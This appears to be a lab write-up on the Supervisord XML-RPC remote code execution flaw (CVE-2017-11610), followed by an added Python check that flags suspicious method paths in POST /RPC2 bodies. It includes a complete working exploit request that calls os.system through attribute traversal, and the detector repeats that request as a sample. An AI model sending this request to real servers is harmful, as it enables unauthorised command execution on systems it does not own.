Lab environment and introduction

Supervisord Remote Code Execution Vulnerability_Video Tutorial_i春秋_Cultivating a sense of security for the information age! (ichunqiu.com)

References

https://blogs.securiteam.com/index.php/archives/3348
https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610

Figure 0

POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

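<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>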

Figure 1
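
The request above names a seven-segment method path that walks from the supervisor namespace down to os.system, whereas ordinary Supervisor XML-RPC calls have the form namespace.method. The following detection check for POST /RPC2 bodies is an added example, not code from the original page or from the Supervisor project; the allowed namespace set, the function names and the benign sample body are assumptions made for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Assumption: only Supervisor's built-in namespaces are exposed; add any plugin namespaces you register.
ALLOWED_NAMESPACES = {"supervisor", "system"}
IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def extract_method_name(body: bytes):
    """Return the <methodName> text of an XML-RPC call, or None if the body is unusable."""
    # Refuse DTDs and entities before parsing so the detector is not an XML attack surface itself.
    if b"<!DOCTYPE" in body or b"<!ENTITY" in body:
        return None
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    if root.tag != "methodCall":
        return None
    name = root.findtext("methodName")
    return name.strip() if name else None


def classify(body: bytes):
    """Return (verdict, reason) for one POST /RPC2 body."""
    name = extract_method_name(body)
    if name is None:
        return ("reject", "not a well-formed XML-RPC methodCall")
    parts = name.split(".")
    if len(parts) != 2:
        # Extra segments mean the caller is asking for attribute traversal, as in the request above.
        return ("alert", f"method path has {len(parts)} segments: {name}")
    namespace, method = parts
    if namespace not in ALLOWED_NAMESPACES:
        return ("alert", f"unknown namespace: {namespace}")
    if not IDENT.match(method) or method.startswith("_"):
        return ("alert", f"non-public method name: {method}")
    return ("allow", name)


# Constructed sample bodies: a normal status call, and the method path from the request above.
BENIGN = b'<?xml version="1.0"?><methodCall><methodName>supervisor.getState</methodName><params/></methodCall>'
PAGE_REQUEST = (b'<?xml version="1.0"?><methodCall><methodName>'
                b"supervisor.supervisord.options.warnings.linecache.os.system"
                b"</methodName><params><param><string>touch /tmp/success</string>"
                b"</param></params></methodCall>")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("page request", PAGE_REQUEST)):
        print(label, classify(body))
```

The same segment-count rule can run in a reverse proxy or log pipeline in front of the XML-RPC port, where an alert verdict is a reason to block the request and review who can reach /RPC2.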